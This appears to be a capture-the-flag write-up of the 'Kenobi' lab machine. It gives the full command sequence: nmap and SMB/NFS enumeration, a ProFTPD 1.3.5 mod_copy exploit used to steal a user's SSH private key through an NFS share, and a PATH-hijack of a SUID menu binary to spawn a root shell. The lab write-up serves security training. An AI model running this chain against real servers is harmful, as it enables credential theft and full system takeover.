Technology with Security
25 June 2020
With nmap scan found the below ports are open ports and running services on the target:
$ nmap 10.10.143.1 -vvv
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
80/tcp open http syn-ack
111/tcp open rpcbind syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
2049/tcp open nfs syn-ack
Samba allows end users to access the files, printers and commonly shared resources on the intra and internet. Often referred as Network File System. It is based on common client/server protocol of Server Message Block (SMB). Note: SMB is developed only for Windows, so without Samba other than Windows platforms would be isolated in the network.
The server has Samba running, so enumerating for shares:
` nmap -p 445 –script=smb-enum-shares.nse,smb-enum-users.nse 10.10.143.1 `
Found below user names and their paths:
guest - C:\tmp
anonymous - C:\home\kenobi\share
print - \var\lib\samba\printers
There is a log.txt
file under anonymous id which contains SSH, FTPd and other information.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.48.174
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
The /var
location is available to mount.
With a simple netcat, we can connect to FTPd service and get the version it is running.
$ nc 10.10.48.174 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.48.174]
From above, we can see the proFTPD is running on 1.3.5 version.
Lets see if there are any exploits available for proFTPD 1.3.5
$ searchsploit proftpd 1.3.5
--------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results Using the mod copy exploit, we can copy the private key that we see in the log.txt to a location where we can access:
nc 10.10.48.174 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.48.174]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful Mount the /var on our system to access the file:
sudo mount 10.10.48.174:/var /mnt/kenobiNFS/
Copy the mnt/kenobiNFS/tmp/id_rsa to a directory and then ssh into the server
ssh -i id_rsa kenobi@10.10.48.174
Finding any abnormal files with SUID bit:
find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 94240 May 8 2019 /sbin/mount.nfs
-rwsr-xr-x 1 root root 14864 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 98440 Jan 29 2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Jan 31 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 23376 Jan 15 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/menu
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
-rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
From the above, we can see the /usr/bin/menu
seems a custom program and lets see if we can do any on this.
The functionality of this custom program seems checking web connection using curl
, kernel version and ip status using ifconfig
.
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2020 22:38:57 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
4.8.0-58-generic
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
eth0 Link encap:Ethernet HWaddr 02:29:8f:02:e1:de
inet addr:10.10.96.188 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::29:8fff:fe02:e1de/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:2405 errors:0 dropped:0 overruns:0 frame:0
TX packets:2269 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:155505 (155.5 KB) TX bytes:3081289 (3.0 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:214 errors:0 dropped:0 overruns:0 frame:0
TX packets:214 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:15541 (15.5 KB) TX bytes:15541 (15.5 KB)
/tmp/curl
which executes /bin/sh
. The path /tmp
will be added to start of the PATH
variable. When a binary is called, it will always check from left to right and our /tmp/curl
will be picked up./usr/bin/menu
has the effective user as root, our command will get execute with root which in turn spawns a root shell. kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 755 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
The flag in /root/root.txt is 177b3cd8562--------2721c28381f02